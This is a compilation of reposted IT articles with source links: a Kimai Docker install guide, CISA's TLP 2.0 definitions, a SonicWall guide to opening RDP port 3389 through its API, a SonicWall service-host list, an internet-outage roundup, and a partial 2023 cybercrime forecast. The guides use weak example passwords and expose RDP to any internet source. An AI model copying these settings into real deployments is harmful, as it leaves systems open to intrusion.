How To Install Kimai Time Tracking App in Docker

In this guide, I’ll show you how to deploy the open source time tracking app Kimai in a Docker container. Kimai is free, browser-based (so it’ll work on mobile devices), and is extremely flexible for just about every use case.

It has a stopwatch feature where you can start/stop/pause a worklog timer. Then, it accumulates the total into daily, weekly, monthly or yearly reports, which can be exported or printed as invoices.

It supports single or multiple users, so you can even track time for your entire department. All statistics are visible on a beautiful dashboard, which makes historical time-tracking a breeze.


Why use Kimai Time Tracker?

For my scenario, I am salaried at work. However, since I’m an IT Manager, I often find myself working after hours or on weekends to patch servers, reboot systems, or perform system and infrastructure upgrades. Normally, I use pen and paper or a notetaking app to track overtime, although this is pretty inefficient. Sometimes I forget when I started or stopped, or if I’ve written down the time on a notepad at home, I can’t view that time at work.

And when it comes to managing a team of others who also perform after hours maintenance, it becomes even harder to track their total overtime hours.

Over the past few weeks, I stumbled across Kimai and really love all the features. Especially since I can spin it up in a Docker container or with Docker Compose!

If you don’t have Docker installed, follow this guide: https://smarthomepursuits.com/how-to-install-docker-ubuntu/

If you don’t have Docker-Compose installed, follow this guide: https://smarthomepursuits.com/how-to-install-portainer-with-docker-in-ubuntu-20-04/

In this tutorial, we will be installing Kimai for a single user using standard Docker run commands. Other users can be added from the web UI after initial setup.


Step 1: SSH into your Docker Host

Open Putty and SSH into your server that is running docker and docker compose.


Step 2: Create Kimai Database container

Enter the command below to create a new database to use with Kimai. You can copy and paste into Putty by right-clicking after copy, or CTRL+SHIFT+V into other ssh clients.

sudo docker run --rm --name kimai-mysql \
    -e MYSQL_DATABASE=kimai \
    -e MYSQL_USER=kimai \
    -e MYSQL_PASSWORD=kimai \
    -e MYSQL_ROOT_PASSWORD=kimai \
    -p 3399:3306 -d mysql
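
Before moving on, it’s worth confirming the database container finished initializing; the official MySQL image should log a “ready for connections” line when it’s done:

sudo docker logs -f kimai-mysql
# look for a line similar to: [Server] ... ready for connections (Ctrl+C to exit)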

Step 3: Start Kimai

Next, start the Kimai container using the database you just created. If you look at the Kimai GitHub page, you’ll notice that this isn’t the same command as the one shown there.

Here’s the original command (which I’m not using):

docker run --rm --name kimai-test -ti -p 8001:8001 -e DATABASE_URL=mysql://kimai:kimai@${HOSTNAME}:3399/kimai kimai/kimai2:apache

And here’s my command. I had to explicitly add TRUSTED_HOSTS, ADMINMAIL, and ADMINPASS, and change ${HOSTNAME} to the IP address of my docker host. Otherwise, I wasn’t able to access Kimai from other computers on my local network.

  • Change the port (8001) if it’s already in use on your host
  • Set TRUSTED_HOSTS to include the IP address of your docker host
  • Set ADMINMAIL and ADMINPASS to the admin email and password you’ll use to log in
  • Change the DATABASE_URL host to your docker host’s IP address
sudo docker run --rm --name kimai -ti -p 8001:8001 -e TRUSTED_HOSTS=192.168.68.141,localhost,127.0.0.1 -e ADMINMAIL=example@gmail.com -e ADMINPASS=8charpassword -e DATABASE_URL=mysql://kimai:kimai@192.168.68.141:3399/kimai kimai/kimai2:apache

Note that 8 characters is the minimum for the password.


Step 4: Log In via Web Browser

Next, Kimai should now be running!

To check, you can go to your http://dockerIP:8001 in a web browser (192.168.68.141:8001)
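
If you’d rather check from the terminal first, something like this confirms the container is up and the web server is answering (adjust the IP and port to match your run command):

sudo docker ps --filter name=kimai
curl -I http://192.168.68.141:8001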

Then simply log in with the credentials you created.


Step 5: Basic Setup

This app is extremely powerful and customizable, so I won’t be going over all the available options since everyone has different needs.

Like I mentioned earlier, I’m using Kimai for overtime tracking only, so the first step for me is to create a new “customer”.

Create a Customer

This is sort of unintuitive, but you need to create a customer before you can start tracking time to a project. I’m creating a generic “Employee” customer.

Click Customers on the left sidebar, then click the + button in the top right corner.

Create A Project

Click Projects on the left sidebar:

Then click the + button in the top right corner.

Add a name, choose the customer you just created, and then choose a date range.

Create An Activity

Click Activity on the left, then create an activity. I’m calling mine Overtime Worked and assigning it to the Project “Overtime 2021” I just created.


Step 6: Change “Timetracking Mode” to Time-clock

Click Settings. Under Timetracking mode, change it to Time-Clock. This will let you click the Play button to start/stop time worked vs having to manually enter start and stop times.


Step 7: Start Tracking Time!

To start tracking time, simply click the timer widget in the top right corner.

A screen will pop up asking you what project and activity you want to apply the time to.

The self-hosted stopwatch will start tracking time right away. You can then view the timesheets for yourself under the My Times section, or for all users under the Timesheets or Reporting tabs.


Wrapping Up

Hopefully this guide helped you get Kimai installed and set up! If you have any questions, feel free to let me know in the comments below and I’ll do my best to help you out.



Source :
https://smarthomepursuits.com/how-to-install-kimai-time-tracking-app-in-docker/

Traffic Light Protocol (TLP) Definitions and Usage

CISA currently uses Traffic Light Protocol (TLP) according to the FIRST Standard Definitions and Usage Guidance — TLP Version 2.0. Note: On Nov. 1, 2022, CISA officially adopted TLP 2.0; however, CISA’s Automated Indicator Sharing (AIS) capability will not update from TLP 1.0 to TLP 2.0 until March 2023. This exception includes AIS’s use of the following open standards: the Structured Threat Information Expression (STIX™) for cyber threat indicators and defensive measures information and the Trusted Automated Exchange of Intelligence Information (TAXII™) for machine-to-machine communications.


What is TLP?

The Traffic Light Protocol (TLP) was created in order to facilitate greater sharing of information. TLP is a set of designations used to ensure that sensitive information is shared with the appropriate audience. It employs five official marking options to indicate expected sharing boundaries to be applied by the recipient(s). TLP only has five marking options; any designations not listed in this standard are not considered valid by FIRST.

TLP provides a simple and intuitive schema for indicating when and how sensitive information can be shared, facilitating more frequent and effective collaboration. TLP is not a “control marking” or classification scheme. TLP was not designed to handle licensing terms, handling and encryption rules, and restrictions on action or instrumentation of information. TLP labels and their definitions are not intended to have any effect on freedom of information or “sunshine” laws in any jurisdiction.

TLP is optimized for ease of adoption, human readability and person-to-person sharing; it may be used in automated sharing exchanges, but is not optimized for that use.

TLP is distinct from the Chatham House Rule (when a meeting, or part thereof, is held under the Chatham House Rule, participants are free to use the information received, but neither the identity nor the affiliation of the speaker(s), nor that of any other participant, may be revealed.), but may be used in conjunction if it is deemed appropriate by participants in an information exchange.

The source is responsible for ensuring that recipients of TLP information understand and can follow TLP sharing guidance.

If a recipient needs to share the information more widely than indicated by the original TLP designation, they must obtain explicit permission from the original source.

How do I determine appropriate TLP designation?

TLP:RED
Not for disclosure, restricted to participants only.
  • When should it be used? Sources may use TLP:RED when information cannot be effectively acted upon without significant risk for the privacy, reputation, or operations of the organizations involved. For the eyes and ears of individual recipients only, no further.
  • How may it be shared? Recipients may not share TLP:RED information with any parties outside of the specific exchange, meeting, or conversation in which it was originally disclosed. In the context of a meeting, for example, TLP:RED information is limited to those present at the meeting. In most circumstances, TLP:RED should be exchanged verbally or in person.

TLP:AMBER+STRICT
Limited disclosure, restricted to participants’ organization.
  • When should it be used? Sources may use TLP:AMBER+STRICT when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organization.
  • How may it be shared? Recipients may share TLP:AMBER+STRICT information only with members of their own organization on a need-to-know basis to protect their organization and prevent further harm.

TLP:AMBER
Limited disclosure, restricted to participants’ organization and its clients (see Terminology Definitions).
  • When should it be used? Sources may use TLP:AMBER when information requires support to be effectively acted upon, yet carries risk to privacy, reputation, or operations if shared outside of the organizations involved. Note that TLP:AMBER+STRICT should be used to restrict sharing to the recipient organization only.
  • How may it be shared? Recipients may share TLP:AMBER information with members of their own organization and its clients on a need-to-know basis to protect their organization and its clients and prevent further harm.

TLP:GREEN
Limited disclosure, restricted to the community.
  • When should it be used? Sources may use TLP:GREEN when information is useful to increase awareness within their wider community.
  • How may it be shared? Recipients may share TLP:GREEN information with peers and partner organizations within their community, but not via publicly accessible channels. Unless otherwise specified, TLP:GREEN information may not be shared outside of the cybersecurity or cyber defense community.

TLP:CLEAR
Disclosure is not limited.
  • When should it be used? Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release.
  • How may it be shared? Recipients may share this information without restriction. Information is subject to standard copyright rules.

TLP 2.0 Terminology Definitions

Community

Under TLP, a community is a group who share common goals, practices, and informal trust relationships. A community can be as broad as all cybersecurity practitioners in a country (or in a sector or region).

Organization

Under TLP, an organization is a group who share a common affiliation by formal membership and are bound by common policies set by the organization. An organization can be as broad as all members of an information sharing organization, but rarely broader.

Clients

Under TLP, clients are those people or entities that receive cybersecurity services from an organization. Clients are by default included in TLP:AMBER so that the recipients may share information further downstream in order for clients to take action to protect themselves. For teams with national responsibility, this definition includes stakeholders and constituents. Note: CISA considers "clients" to be stakeholders and constituents that have a legal agreement with CISA.

Usage

How to use TLP in email

TLP-designated email correspondence should indicate the TLP color of the information in the Subject line and in the body of the email, prior to the designated information itself. The TLP color must be in capital letters: TLP:RED, TLP:AMBER+STRICT, TLP:AMBER, TLP:GREEN, or TLP:CLEAR.
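For example (an illustrative sketch only, not official CISA wording), a TLP:AMBER email would carry the marking in both the subject line and the body, before the sensitive content:

Subject: TLP:AMBER - Suspicious activity observed on shared infrastructure

TLP:AMBER
<designated information goes here>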

How to use TLP in documents

TLP-designated documents should indicate the TLP color of the information in the header and footer of each page. To avoid confusion with existing control marking schemes, it is advisable to right-justify TLP designations. The TLP color should appear in capital letters and in 12 point type or greater. Note: TLP 2.0 has changed the color coding of TLP:RED to accommodate individuals with low vision.

RGB:
TLP:RED : R=255, G=43, B=43, background: R=0, G=0, B=0
TLP:AMBER : R=255, G=192, B=0, background: R=0, G=0, B=0
TLP:GREEN : R=51, G=255, B=0, background: R=0, G=0, B=0
TLP:CLEAR : R=255, G=255, B=255, background: R=0, G=0, B=0

CMYK:
TLP:RED : C=0, M=83, Y=83, K=0, background: C=0, M=0, Y=0, K=100
TLP:AMBER : C=0, M=25, Y=100, K=0, background: C=0, M=0, Y=0, K=100
TLP:GREEN : C=79, M=0, Y=100, K=0, background: C=0, M=0, Y=0, K=100
TLP:CLEAR : C=0, M=0, Y=0, K=0, background: C=0, M=0, Y=0, K=100

Source :
https://www.cisa.gov/tlp

Port Forwarding configured using SonicOS API

Description

This article describes the steps involved in creating policies using SonicOS APIs that let you access internal devices or servers behind the SonicWall firewall.

Cause

By default, SonicWall does not allow inbound traffic that is not part of a session initiated by an internal device on the network. This is done to protect the devices on the internal network from malicious access. If required, certain parts of the network can be opened to external access, for example web servers, Exchange servers, and so on.

To open the network, we need to specify an access rule from the external network to the internal network and a NAT policy so that traffic is directed only to the intended device.

With APIs this can be done at scale; for example, you can create multiple access rules and NAT policies with one command, with all the attributes specified as JSON objects.

Resolution

Manually opening ports / enabling port forwarding to allow traffic from the Internet to a server behind the SonicWall using the SonicOS API involves the following steps:

Step 1: Enabling the API Module.

Step 2: Getting into Swagger.

Step 3: Logging in to the SonicWall with the API.

Step 4: Creating Address Objects and Service Objects with the API.

Step 5: Creating the NAT Policy with the API.

Step 6: Creating Access Rules with the API.

Step 7: Committing all the configuration changes made with the API.

Step 8: Logging out of the SonicWall with the API.

Scenario Overview

The following walk-through details allowing TCP 3389 from the Internet to a terminal server on the local network. Once the configuration is complete, Internet users can RDP into the terminal server using the WAN IP address. Although the examples below show the LAN zone and TCP 3389, they can apply to any zone and any port that is required.

Step 1: Enabling the API Module

  1. Log into the SonicWall GUI.
  2. Click Manage in the top navigation menu.
  3. Click Appliance | Base Settings.
  4. Under Base Settings, search for SonicOS API.
  5. Click Enable SonicOS API.
  6. Click Enable RFC-2617 HTTP Basic Access authentication.

Step 2: Getting into Swagger

  1. Click on the Manage tab.
  2. Scroll down to find API.
  3. Click on the link https://sonicos-api.sonicwall.com.
  4. Swagger will prepopulate your SonicWall's IP, management port, and firmware version so it can give you a list of applicable APIs.

 NOTE: All the APIs required for configuring Port Forwarding will be listed in this Article.


Step 3: Logging in to the SonicWall with the API

  1. curl -k -i -u "admin:password" -X POST https://192.168.168.168:443/api/sonicos/auth

      "admin:password" – Replace this with your SonicWall's username:password.

      https://192.168.168.168:443/ – Replace this with your SonicWall's public or private IP address.

The command output should contain the string: "success": true


 NOTE: You are free to choose Swagger, Postman, Git Bash, or any application that allows API calls; if you are using a Linux-based operating system, you can execute cURL from the terminal. For this article I am using Git Bash on Windows.

Step 4: Creating Address Objects and Service Objects with the API

  1. curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/address-objects/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d "{\"address_object\":{\"ipv4\":{\"name\":\"Term Server Private\",\"zone\":\"LAN\",\"host\":{\"ip\":\"192.168.168.10\"}}}}" && curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/address-objects/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d "{\"address_object\":{\"ipv4\":{\"name\":\"Term Server Public\",\"zone\":\"WAN\",\"host\":{\"ip\":\"1.1.1.1\"}}}}"

 OR 

curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/address-objects/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d @add.Json

@add.Json is a file with the following information:

{
  "address_objects": [
    {
      "ipv4": {
        "name": "Term Server Private",
        "zone": "LAN",
        "host": {
          "ip": "192.168.168.10"
        }
      }
    },
    {
      "ipv4": {
        "name": "Term Server Public",
        "zone": "WAN",
        "host": {
          "ip": "1.1.1.1"
        }
      }
    }
  ]
}

[Image: output of the first command, where the address object data was passed inline instead of via a separate file]

[Image: output of the second command, where the @add.Json file was used instead of specifying the data inline]

 TIP: If you are creating only one address object, the first command should be sufficient; if you are creating multiple address objects, use the second command.

 CAUTION: I have the add.Json file saved to my desktop, which is why I can reference it in the command. If you created the JSON file in a different location, make sure you execute the command from that location.

2. Adding the service object:

 curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/service-objects" -H "accept: application/json" -H "Content-Type: application/json" -d @serviceobj.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

@serviceobj.Json is a file that contains the Attributes of the service object:

{
  "service_object": {
    "name": "Terminal Server 3389",
    "TCP": {
      "begin": 3389,
      "end": 3389
    }
  }
}

[Image: output of the command]

 3. Committing the changes made to the SonicWall: we need to do this to be able to use the address objects and service objects we just created in a NAT policy and an access rule.

  curl -k -X POST "https://192.168.168.168:443/api/sonicos/config/pending" -H "accept: application/json"

  https://192.168.168.168:443 – Replace that with the IP of the SonicWall

[Image: output of the command]

Step 5: Creating the NAT Policy with the API

  1. curl -k -i -X POST "https://192.168.168.168:443/api/sonicos/nat-policies/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d @natpolicy.Json

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall

         @natpolicy.Json is a file that contains the Attributes of the NAT Policy:

{
  "nat_policies": [
    {
      "ipv4": {
        "name": "Inbound NAT 3389",
        "enable": true,
        "comment": "",
        "inbound": "X1",
        "outbound": "any",
        "source": {
          "any": true
        },
        "translated_source": {
          "original": true
        },
        "destination": {
          "name": "Term Server Public"
        },
        "translated_destination": {
          "name": "Term Server Private"
        },
        "service": {
          "name": "Terminal Server 3389"
        },
        "translated_service": {
          "original": true
        }
      }
    }
  ]
}

[Image: output of the command]

Step 6: Creating Access Rules with the API

  1. curl -k -X POST "https://192.168.168.168:443/api/sonicos/access-rules/ipv4" -H "accept: application/json" -H "Content-Type: application/json" -d @accessrule.Json

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

@accessrule.Json is a file that contains the Attributes of the access rule:

{
  "access_rules": [
    {
      "ipv4": {
        "name": "Inbound 3389",
        "enable": true,
        "from": "WAN",
        "to": "LAN",
        "action": "allow",
        "source": {
          "address": {
            "any": true
          },
          "port": {
            "any": true
          }
        },
        "service": {
          "name": "Terminal Server 3389"
        },
        "destination": {
          "address": {
            "name": "Term Server Public"
          }
        }
      }
    }
  ]
}

[Image: output of the command]

Step 7: Committing all the configuration changes made with the API

  1. We already committed the address objects and service objects in Step 4. In this step we commit the NAT policy and the access rule to the SonicWall's configuration:

curl -k -X POST "https://192.168.168.168:443/api/sonicos/config/pending" -H "accept: application/json"

https://192.168.168.168:443 – Replace that with the IP of the SonicWall

We have only used the POST method in most of the API calls in this article because we are only adding things to the configuration; there are other methods such as GET, DELETE, and PUT. I recommend that you go through https://sonicos-api.sonicwall.com for more API commands.
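For example (a sketch that is not part of the original walkthrough; it reuses the example IP address and the RFC-2617 Basic authentication enabled in Step 1), a GET against the address-objects endpoint should list the IPv4 address objects created in Step 4, which is a handy way to confirm your changes took effect:

curl -k -i -u "admin:password" -X GET https://192.168.168.168:443/api/sonicos/address-objects/ipv4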

Step 8: Logging out of the SonicWall with the API

  1. It is recommended to log out from the SonicWall via the API once the desired configuration is committed.

         curl -k -i -u "admin:password" -X DELETE https://192.168.168.168:443/api/sonicos/auth

         https://192.168.168.168:443 – Replace that with the IP of the SonicWall.

         "admin:password" – The actual username and password for the SonicWall.

[Image: output of the command]

 CAUTION: If you skip the commit in Step 7 and execute the command in Step 8, you will lose all the configuration changes made in the current session.

Summary: We have successfully configured port forwarding so that a user on the Internet can access a terminal server behind the firewall on port 3389 using the SonicOS API.

 NOTE: It is always recommended to use a client VPN for RDP connections; this article is just an example.
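Once the rules are committed, a quick way to confirm the port forward from outside your network (a sketch using the example WAN IP 1.1.1.1 from this walkthrough; substitute your real WAN IP) is to test the TCP port with netcat:

# From an external host: verify TCP 3389 is reachable on the WAN IP (5-second timeout)
nc -vz -w 5 1.1.1.1 3389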


Source :
https://www.sonicwall.com/support/knowledge-base/port-forwarding-with-sonicos-api-using-postman-and-curl/190224162643523/

What FQDNs and IPs are used by SonicWall products to update their services?

Description

This article lists the Fully Qualified Domain Names (FQDNs) in use by SonicWall for its licensing and security services.

Resolution

SonicWall firewalls:

  • lm2.sonicwall.com – Registration information/licensing.
  • licensemanager.sonicwall.com – Registration information/licensing for older firewalls.
  • software.sonicwall.com – Software, firmware, NetExtender, GVC.
  • responder.global.sonicwall.com – Probe target.
  • clientmanager.sonicwall.com – Client CF enforcement download.
  • policymanager.sonicwall.com – Global Security Client.
  • convert.global.sonicwall.com – Preference processor server.
  • geodnsd.global.sonicwall.com – Used for flow reporting and GeoIP.
  • webcfs00.global.sonicwall.com – Content filter server.
  • webcfs01.global.sonicwall.com – Content filter server.
  • webcfs02.global.sonicwall.com – Content filter server.
  • webcfs03.global.sonicwall.com – Content filter server.
  • webcfs04.global.sonicwall.com – Content filter server.
  • webcfs05.global.sonicwall.com – Content filter server.
  • webcfs06.global.sonicwall.com – Content filter server.
  • webcfs07.global.sonicwall.com – Content filter server.
  • webcfs08.global.sonicwall.com – Content filter server.
  • webcfs10.global.sonicwall.com – Content filter server.
  • webcfs11.global.sonicwall.com – Content filter server.
  • gcsd.global.sonicwall.com – Cloud antivirus and status.
  • sig2.sonicwall.com – Signature updates.
  • sigserver.global.sonicwall.com – Signature updates for older firewalls.
  • lmdashboard.global.sonicwall.com – License manager dashboard.
  • appreports.global.sonicwall.com – App reports server.
  • sonicsandbox.global.sonicwall.com – Default Capture ATP server (west coast) UDP 2259, and https (tcp 443).
  • sonicsandboxmia.global.sonicwall.com  – East coast capture ATP server UDP 2259, and https (tcp 443).
  • utmgbdata.global.sonicwall.com – Map info URL domain.
  • cfssupport.sonicwall.com – View rating of a website.
  • cloudtt.global.sonicwall.com – Zero Touch provisioning
  • eprs2.global.sonicwall.com (204.212.170.36, 204.212.170.11, 204.212.170.10) – Content Filter Client servers.
  • wsdl.mysonicwall.com  – Automatic preference backups and firmware downloads.
  • sonicsandbox.global.sonicwall.com
  • sonicsandboxmia.global.sonicwall.com
  • sonicsandboxams.global.sonicwall.com
  • sonicsandboxfra.global.sonicwall.com
  • sonicsandboxtko.global.sonicwall.com

    This information can also be found in the Tech Support Report (TSR). More information about the TSR can be found in the following article:
    How to Download Tech Support Files (TSR, EXP, Logs) From SonicWall UTM Firewalls
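To sanity-check that your firewall's network can resolve these hosts, a small shell loop is enough (a sketch; the hostnames below are a subset of the list above, so adjust it to the services you actually use):

for host in lm2.sonicwall.com software.sonicwall.com sig2.sonicwall.com sonicsandbox.global.sonicwall.com; do
  # Print each hostname next to the first address it resolves to
  printf '%-45s %s\n' "$host" "$(dig +short "$host" | head -n 1)"
done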

Capture Client software:

  • captureclient-36.sonicwall.com
  • captureclient.sonicwall.com
  • sonicwall.sentinelone.net (S1 agent)
  • software.sonicwall.com (software package updates)
  • sonicsandbox.global.sonicwall.com (Capture ATP- Applicable for Capture Client Advanced License)

SonicWall CSC:

  • For SanJose Colo

    FQDN: cloudgms.sonicwall.com
    Zero Touch FQDN: cloudtt.global.sonicwall.com
    IP: 4.16.47.168, 4.16.47.188

  • For AWS Colo

    FQDN: cscma.sonicwall.com
    Zero Touch FQDN: cscmatt.global.sonicwall.com
    IP: 34.211.138.110, 52.37.12.168, 52.89.82.203, 52.11.92.114

  • For AMS Colo

    FQDN: cloudgmsams.sonicwall.com
    Zero Touch FQDN: cloudttams.global.sonicwall.com
    IP: 213.244.188.168, 213.244.188.188

  • For AWS-FRA Colo

    FQDN: cscmafra.sonicwall.com
    Zero Touch FQDN: cscmafratt.global.sonicwall.com, cscmafratta.global.sonicwall.com
    IP: 18.197.234.66, 18.197.234.59

SonicWall NSM:

  • For Oregon AWS Colo

    FQDN: nsm-uswest.sonicwall.com (Use it in GMS settings under Administration Page)
    Zero Touch FQDN: nsm-uswest-zt.sonicwall.com (Use it in ZeroTouch Settings under Diag page)
    IP: 13.227.130.81, 13.227.130.63, 3.227.130.69, 13.227.130.12, 52.39.29.75, 44.233.105.101, 44.227.248.206

  • For AWS-FRA Colo

    FQDN: nsm-eucentral.sonicwall.com (Use it in GMS settings under Administration Page)
    Zero Touch FQDN: nsm-eucentral-zt.sonicwall.com (Use it in ZeroTouch Settings under Diag page)
    IP: 13.227.130.70, 13.227.130.69, 13.227.130.15, 13.227.130.92, 18.156.16.24, 18.157.240.148, 3.127.176.56


Source :
https://www.sonicwall.com/support/knowledge-base/what-fqdn-s-and-ip-s-are-used-by-sonicwall-products-to-update-their-services/170503941664663/

The 12 Most Impactful Internet Outages

An internet outage can have major consequences for a digital business, especially when it happens during peak usage times and on holidays. Outages can lead to revenue loss, complaints, and customer churn. 

Of course, internet outages regularly impact companies across all verticals, including some of the largest internet companies in the world. And they can happen when you least expect them. 

Read on to learn about some of the most impactful internet outages to date and some steps you can take to keep your business out of harm’s way.

Historical Internet Outages You Need to Know About 

1. Amazon Web Services 

Amazon Web Services (AWS) experienced a major outage in December 2021, lasting for several hours. The outage impacted operations for many leading businesses, including Netflix, Disney, Spotify, DoorDash, and Venmo. 

Amazon blamed the outage on an automation error that caused multiple systems to act abnormally. The outage also prevented users from accessing some cloud services.

This outage proved that even the largest and safest cloud providers are susceptible to downtime.

2. Facebook 

Facebook also suffered a major outage in 2021, leaving billions of users unable to access its services, including its main social network, Instagram, and WhatsApp.

According to Facebook, the cause of the outage was a configuration change on its backbone routers responsible for transmitting traffic across its data centers. The outage lasted roughly six hours, an eternity for a social network.

3. Fastly 

Cloud service provider Fastly had its network go down in June 2021, taking down several sizeable global news websites, including the New York Times and CNN. It also impacted retailers like Target and Amazon, and several other organizations.

The outage resulted from a faulty software update, stemming from a misconfiguration, causing disruptions across multiple servers.  

4. British Airways 

British Airways experienced a massive IT failure in 2017 during one of the busiest travel weekends in the United Kingdom. 

This event created a nightmare scenario for the organization and its customers. Altogether, it grounded 672 flights and stranded tens of thousands of customers.

According to the company, the outage ensued when an engineer disconnected the data center’s power supply. A massive power surge came next, bringing the business’s network down in the process.

5. Google

Google had a major service outage in 2020. It only lasted about forty-five minutes, but it still impacted users worldwide. 

Services including Gmail, YouTube, and Google Calendar all crashed. So did Google Home apps. The outage also impacted third-party applications using Google for authentication.

The issue happened due to inadequate storage capacity for the company’s authentication services.

6.  Dyn

Undoubtedly, one of the biggest distributed denial-of-service (DDoS) attacks in history occurred in 2016 against Dyn, a major DNS provider.

The attack occurred in three waves, overwhelming the company’s servers. As a result, many internet users were unable to access partnering platforms like Twitter, Spotify, and Netflix. 

7. Verizon Fios

Verizon had a major internet outage in January 2021, which disrupted tens of thousands of customers along the East Coast.

While the internet outage lasted only about an hour, Verizon experienced a sharp drop in traffic volume. Naturally, many customers complained about the loss of service. 

At first, the company reported the incident was the result of someone cutting fiber cables. However, it was unrelated and turned out to be a “software issue” during routine network maintenance activities. 

8. Microsoft 

Another major internet outage occurred at Microsoft when its Azure service went under in December 2021. Azure’s Active Directory service crashed for about ninety minutes. 

Compared to some other outages, this one was relatively small. Nonetheless, it prevented users from signing in to Microsoft services such as Office 365. Although applications remained online, users couldn’t access them, making this a major productivity killer for many organizations worldwide.

9. Comcast

There was an internet outage at Comcast in November 2021, which happened when its San Francisco backbone shut down for about two hours.

Following the outage, a broader issue occurred, spanning multiple U.S. cities, including hubs like Philadelphia and Chicago. Several thousand customers lost service, leaving them unable to access basic network functionality during the height of the pandemic. 

10. Akamai Edge DNS

Akamai, a global content delivery provider, experienced an outage with its DNS service in 2021. The Akamai outage resulted from a faulty software configuration update activating a bug in its Secure Edge Content Delivery Network. 

In a similar fashion to other attacks against service providers, Akamai’s outage caused widespread damage. Other websites—including American Airlines, Fox News, and Steam—all experienced performance issues following the incident.

11. Cox Communications

Cox Communications reported a major internet outage in March 2022, impacting nearly seven thousand customers in the Las Vegas region. 

The problem resulted from an NV Energy backhoe damaging a transmission line and triggering a power event. The surge caused a cable modem to reset, and many customers tried to reconnect simultaneously. As a result, it took several hours for service to resume. 

12.  Slack

The Slack outage in January 2021 created havoc for distributed workers who rely on the platform for communication and collaboration.

The platform’s outage impacted organizations across the US, UK, Germany, Japan, and India, with interruptions occurring for about two and a half hours. Slack says the issue came from scaling problems on the AWS Transit Gateway, which couldn’t accommodate a spike in traffic. 

Best Practices for Avoiding Internet Outages

At the end of the day, there’s nothing you can do to prevent outages entirely, especially if your business relies on multiple third-party systems. Eventually, your company or a partner will experience some level of service disruption. It’s best to plan for them and, where possible, enable systems to ‘fail gracefully.’

As part of your resiliency planning, here are some steps to mitigate damage, maximize uptime, and keep your organization safe, along with some best practices to help you avoid disruptions from network and connectivity issues. 

Set Up a Backup Internet Solution

It’s impossible to protect your business from local internet outages completely. They can stem from issues like local construction, service disruptions, and more. 

Consider setting up a backup internet solution as a workaround, so you never lose connectivity. For example, you may choose to combine broadband with a wireless failover solution.

Consider a Multi-Cloud Strategy

If your business is in the cloud, it’s a good idea to explore a multi-cloud strategy. By spreading your workloads across multiple cloud providers, you can prevent cloud service disruptions from knocking your digital applications offline. This approach can also improve uptime and resiliency.

Use Website Performance and Availability Monitoring

One of the best ways to protect your business is to use website performance and availability monitoring. It provides real-time visibility into how end users are interacting with and experiencing your website.

A robust website performance and availability monitoring solution can provide actionable insights into the health and stability of your website. As a result, you can track uptime and performance over time and troubleshoot issues when they occur.

The Pingdom Approach to Website Performance Monitoring

SolarWinds® Pingdom® provides real-time and historical end-user experience monitoring, giving your team deep visibility from a single pane of glass. With Pingdom, it’s possible to protect against the kind of outages that put your company in the headlines for the wrong reasons.

When you’re ready to jump in, try Pingdom by requesting a free trial today.

This post was written by Justin Reynolds. Justin is a freelance writer who enjoys telling stories about how technology, science, and creativity can help workers be more productive. In his spare time, he likes seeing or playing live music, hiking, and traveling.

Source :
https://www.pingdom.com/outages/internet-outages-the-12-most-impactful/

Cybercrime (and Security) Predictions for 2023

Threat actors continue to adapt to the latest technologies, practices, and even data privacy laws—and it’s up to organizations to stay one step ahead by implementing strong cybersecurity measures and programs.

Here’s a look at how cybercrime will evolve in 2023 and what you can do to secure and protect your organization in the year ahead.

Increase in digital supply chain attacks #

With the rapid modernization and digitization of supply chains come new security risks. Gartner predicts that by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains—this is a three-fold increase from 2021. Previously, these types of attacks weren’t even likely to happen because supply chains weren’t connected to the internet. But now that they are, supply chains need to be secured properly.

The introduction of new technology around software supply chains means there are likely security holes that have yet to be identified, but are essential to uncover in order to protect your organization in 2023.

If you’ve introduced new software supply chains to your technology stack, or plan to do so sometime in the next year, then you must integrate updated cybersecurity configurations. Employ people and processes that have experience with digital supply chains to ensure that security measures are implemented correctly.

Mobile-specific cyber threats are on-the-rise#

It should come as no surprise that with the increased use of smartphones in the workplace, mobile devices are becoming a greater target for cyber-attack. In fact, cyber-crimes involving mobile devices have increased by 22% in the last year, according to the Verizon Mobile Security Index (MSI) 2022, with no signs of slowing down heading into the new year.

As hackers hone in on mobile devices, SMS-based authentication has inevitably become less secure. Even the seemingly most secure companies can be vulnerable to mobile device hacks. Case in point: several major companies, including Uber and Okta, were impacted by security breaches involving one-time passcodes in the past year alone.

This calls for the need to move away from relying on SMS-based authentication, and instead to multifactor authentication (MFA) that is more secure. This could include an authenticator app that uses time-sensitive tokens, or more direct authenticators that are hardware or device-based.

Organizations need to take extra precautions to prevent attacks that begin with the frontline by implementing software that helps verify user identity. According to the World Economic Forum’s 2022 Global Risks Report, 95% of cybersecurity incidents are due to human error. This fact alone emphasizes the need for a software procedure that decreases the chance of human error when it comes to verification. Implementing a tool like Specops’ Secure Service Desk helps reduce vulnerabilities from socially engineered attacks that are targeting the help desk, enabling a secure user verification at the service desk without the risk of human error.

Double down on cloud security #

As more companies opt for cloud-based activities, cloud security—any technology, policy, or service that protects information stored in the cloud—should be a top priority in 2023 and beyond. Cyber criminals become more sophisticated and evolve their tactics as technologies evolve, which means cloud security is essential as you rely on it more frequently in your organization.

The most reliable safeguard against cloud-based cybercrime is a zero trust philosophy. The main principle behind zero trust is to automatically verify everything—and essentially not trust anyone without some type of authorization or inspection. This security measure is critical when it comes to protecting data and infrastructure stored in the cloud from threats.

Ransomware-as-a-Service is here to stay #

Ransomware attacks continue to increase at an alarming rate. Data from Verizon discovered a 13% increase in ransomware breaches year-over-year. Ransomware attacks have also become increasingly targeted — sectors such as healthcare and food and agriculture are just the latest industries to be victims, according to the FBI.

